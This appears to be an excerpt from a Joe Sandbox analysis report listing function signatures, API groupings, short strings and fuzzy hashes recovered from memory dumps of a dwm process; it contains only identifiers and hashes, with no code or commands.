                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 9c97de133244d466fd9d4f449c096b2ff238832ebb9217629b83df121b1a857d
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 7651E43A311A82AAEB74CF15E44CB6C33B1F344B98F298525EAC647BC9D779C841C715
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 9e7f6acbf74b7a19f5a368e77507c73e2d452fc3a76eb8ba7105daeb0c7a0f4f
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: AA61C033508BC481EB349F15E48479EBBB0F784B98F445216EB8983B99DB7EC190CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 631027331caa43d56e79256c1cf69816f08421b8871a2c17b68a258bd017b566
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: A961EF32509BC482EB318F15E4847DAB7B0F785B98F245216EBCC93B99DBB9D090CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 77d90d6b92ea5bb553dfccb31aec47514666af2ac8d44396a35cae7661ad1a5d
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: A361CC32508BC592EB718F25E44539ABBB0F789B88F684215EBD807F99DB7CC590CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: a2016ffaf16664528dbd7c34dcfa2a8b625362b1d5d64cbad52d52b1f553e444
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: 6951F42620478191EA24DE2DB85C3AA77B1F384B90F640025CDDD63F89EB3BCD04C762
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 5d5b9fe66ed7a0b493611d45785aae115f712fb6bdf179b2d195952f945683be
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: C551192624478161EAB6DE2DA45C3AA77F1F398780F780029CDC943F8BDB39C544C762
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 49fdd62030acc719f4bd7a86daf3eeaca2f80af2afb40dbbe80962308d95d0c4
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 49410973625A8086E760DF6AE4487AAB7B0F348784FA44121EECD87758EF38C651C761
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 5f14883872db6cc69e978646f2907d5576a4270c535a5ea4fd3ff96dcb071691
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 95410A72615B8096EB70DF69E84879AB7B0F358794F640121EECD87B98EB3CC441C751
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: 940565ec5c046a7a3cba980f6eeba56df11988a2f98ee2ec351f5ed982885768
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: EB11FB72614B8082EB618B15F848259B7F5F788B94F684625EECD17BA8EF3DC951CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: fd45eea6e8243d6ee93284cc212565fd665dd89b383d95579792cf4b2c31296b
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 96118C21A01B8095EA15DF6AA80826977B1FB88FD0F695128DECE53B65EF39D952C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 30aa08e9776ea0cad61db7092c1e0e9ae49d84499b26f7f7cbecf5e595806920
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 49E06DB1601604AAE714AF62D80C36937F2FB88F05F54C424C98D07390EF7D85A9C761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 03daca1251b3f575f16d13e208a9cc183863994b71d6e4aa167fd1a4dba97f45
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: B1E03931701A04AAE725AB62E80834937E2EB98B05F548024C98907750EF7D84DDC761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 506ac239137d1aeea9d62bb7478cb15fb7fc01b17476a325a4cb1bb507488526
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 64E012B1611504ABE718AF62DC0836977F2FB8CF15F548464C94D07350EF3C85A9D721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 5474bef31ff282b6388866029c6cd3c63edfe48d2c9275a8bdd1e4d734c1f980
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 6FE0ED71711904AAE729AB62D80825977B2FB98B15F548064C94907710EF3C84DDD621